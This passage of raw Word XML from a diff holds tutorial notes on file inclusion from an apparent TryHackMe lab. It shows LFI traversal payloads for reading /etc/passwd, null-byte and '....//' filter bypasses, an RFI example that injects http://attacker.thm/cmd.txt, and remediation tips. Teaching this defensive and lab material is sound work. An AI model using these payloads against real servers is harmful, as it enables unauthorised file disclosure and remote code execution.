+        <w:t>the</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> include function looks like: </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>include(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>languages/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>THM.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>);.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">If you look at the directory closely, we can tell the function includes files in the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>languages</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> directory is adding .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> at the end of the entry. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Thus</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> the valid input will be something as follows: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>index.php?lang</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=EN, where the file EN is located inside the given languages directory and named </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>EN.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Also, the error message disclosed another important piece of information about the full web application directory path which is /var/www/html/THM-4/.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>To exploit this, we need to use the</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t> ..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>/ trick, as described in the directory traversal section, to get out the current folder. Let's try the following:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>http://webapp.thm/index.php?lang</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>=../../../..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>/etc/passwd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Note that we used 4</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t> ..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>/ because we know the path has four levels /var/www/html/THM-4. But we still receive the following error:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Warning: include(languages/../../../../../</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>passwd.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>): failed to open stream: No such file or directory in /var/www/html/THM-4/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>index.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> on line 12</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>It seems we could move out of the PHP directory but still, the include function reads the input with .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t> at the end! This tells us that the developer specifies the file type to pass to the include function. To bypass this scenario, we can use the NULL BYTE, which is %00.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Using null bytes is an injection technique where URL-encoded representation such as %00 or 0x00 in hex with user-supplied data to terminate strings. You could think of it as trying to trick the web app into disregarding whatever comes after the Null Byte.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>By adding the Null Byte at the end of the payload, we tell the include function to ignore anything after the null byte which may look like:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>include("languages</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>/../../../../..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/passwd%00").".</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>"); which is equivalent to include("languages</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>/../../../../..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/passwd");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Note:</w:t>
+      </w:r>
+      <w:r>
+        <w:t> the %00 trick is fixed and not working with PHP 5.3.4 and above.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Now apply what we showed in Lab #3, and try to read files /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>/passwd, answer question #1 below.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>#4.</w:t>
+      </w:r>
+      <w:r>
+        <w:t> In this section, the developer decided to filter keywords to avoid disclosing sensitive information! The /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">/passwd file is being filtered. There are two possible methods to bypass the filter. First, by using the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NullByte</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> %00 or the current directory trick at the end of the filtered </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>keyword </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>/..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t> The exploit will be similar to http://webapp.thm/index.php?lang=/etc/passwd/. We could also use http://webapp.thm/index.php?lang=/etc/passwd%00.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>To make it clearer, if we try this concept in the file system using cd</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve"> ..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>, it will get you back one step; however, if you do </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>cd .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>, It stays in the current directory. Similarly, if we try /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/passwd</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>/..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>, it results to be /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/ and that's because we moved one to the root. Now if we try /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/passwd/., the result will be /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/passwd since dot refers to the current directory.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Now apply this technique in Lab #4 and figure out to read /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>/passwd.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>#5.</w:t>
+      </w:r>
+      <w:r>
+        <w:t> Next, in the following scenarios, the developer starts to use input validation by filtering some keywords. Let's test out and check the error message!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>http://webapp.thm/index.php?lang</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>=../../../..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>/etc/passwd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>We got the following error!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Warning: include(languages/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/passwd): failed to open stream: No such file or directory in /var/www/html/THM-5/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>index.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> on line 15</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>If we check the warning message in the include(languages/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/passwd) section, we know that the web application replaces the</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t> ..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>/ with the empty string. There are a couple of techniques we can use to bypass this.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>First, we can send the following payload to bypass it: </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>....//....//....//....//....//</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/passwd</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Why did this work?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>This works because the PHP filter only matches and replaces the first subset string</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t> ..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>/ it finds and doesn't do another pass, leaving what is pictured below.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="227BDC83" wp14:editId="50FEB3B8">
+            <wp:extent cx="5943600" cy="2197100"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="889053257" name="Picture 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 6"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId76">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2197100"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Try out Lab #5 and try to read /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>/passwd and bypass the filter!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>#6.</w:t>
+      </w:r>
+      <w:r>
+        <w:t> Finally, we'll discuss the case where the developer forces the include to read from a defined directory! For example, if the web application asks to supply input that has to include a directory such as: http://webapp.thm/index.php?lang=languages/EN.php then, to exploit this, we need to include the directory in the payload like so</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: ?lang</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>=languages</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>/../../../../..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/passwd.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Try this out in Lab #6 and figure what the directory that has to be present in the input field is.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>f-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Remote File Inclusion </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> RFI</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Remote File Inclusion - RFI</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Remote File Inclusion (RFI) is a technique to include remote files into a vulnerable application. Like LFI, the RFI occurs when improperly sanitizing user input, allowing an attacker to inject an external URL into include function. One requirement for RFI is that the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>allow_url_fopen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t> option needs to be on.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The risk of RFI is higher than LFI since RFI vulnerabilities allow an attacker to gain Remote Command Execution (RCE) on the server. Other consequences of a successful RFI attack include:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Sensitive Information Disclosure</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Cross-site Scripting (XSS)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Denial of Service (DoS)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>An external server must communicate with the application server for a successful RFI attack where the attacker hosts malicious files on their server. Then the malicious file is injected into the include function via HTTP requests, and the content of the malicious file executes on the vulnerable application server.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>RFI steps</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23D188A1" wp14:editId="4018233F">
+            <wp:extent cx="5943600" cy="3674110"/>
+            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
+            <wp:docPr id="409454075" name="Picture 9"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 18"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId77">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3674110"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The figure above is an example of steps for a successful RFI attack! Let's say that the attacker hosts a PHP file on their own server http://attacker.thm/cmd.txt where cmd.txt contains a printing message Hello THM.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>&lt;?PHP</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> echo "Hello THM"</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38735B23" wp14:editId="75DFB246">
+                <wp:extent cx="304800" cy="304800"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:docPr id="803656948" name="Rectangle 8"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr>
+                        <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="304800" cy="304800"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:noFill/>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                        <a:extLst>
+                          <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
+                            <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
+                              <a:solidFill>
+                                <a:srgbClr val="FFFFFF"/>
+                              </a:solidFill>
+                            </a14:hiddenFill>
+                          </a:ext>
+                          <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
+                            <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
+                              <a:solidFill>
+                                <a:srgbClr val="000000"/>
+                              </a:solidFill>
+                              <a:miter lim="800000"/>
+                              <a:headEnd/>
+                              <a:tailEnd/>
+                            </a14:hiddenLine>
+                          </a:ext>
+                        </a:extLst>
+                      </wps:spPr>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" upright="1">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:rect w14:anchorId="6837359D" id="Rectangle 8" o:spid="_x0000_s1026" style="width:24pt;height:24pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+                <o:lock v:ext="edit" aspectratio="t"/>
+                <w10:anchorlock/>
+              </v:rect>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:t>First, the attacker injects the malicious URL, which points to the attacker's server, such as http://webapp.thm/index.php?lang=http://attacker.thm/cmd.txt. If there is no input validation, then the malicious URL passes into the include function. Next, the web app server will send a GET request to the malicious server to fetch the file. As a result, the web app includes the remote file into include function to execute the PHP file within the page and send the execution content to the attacker. In our case, the current page somewhere has to show the Hello THM message.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Visit the following lab URL: http://10.10.127.52/playground.php to try out an RFI attack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>g-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>Remediation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>As a developer, it's important to be aware of web application vulnerabilities, how to find them, and prevention methods. To prevent the file inclusion vulnerabilities, some common suggestions include:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Keep system and services, including web application frameworks, updated with the latest version.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Turn off PHP errors to avoid leaking the path of the application and other potentially revealing information.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>A Web Application Firewall (WAF) is a good option to help mitigate web application attacks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Disable some PHP features that cause file inclusion vulnerabilities if your web app doesn't need them, such as </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>allow_url_fopen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t> on and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>allow_url_include</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Carefully analyze the web application and allow only protocols and PHP wrappers that are in need.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Never trust user input, and make sure to implement proper input validation against file inclusion.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Implement whitelisting for file names and locations as well as blacklisting.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
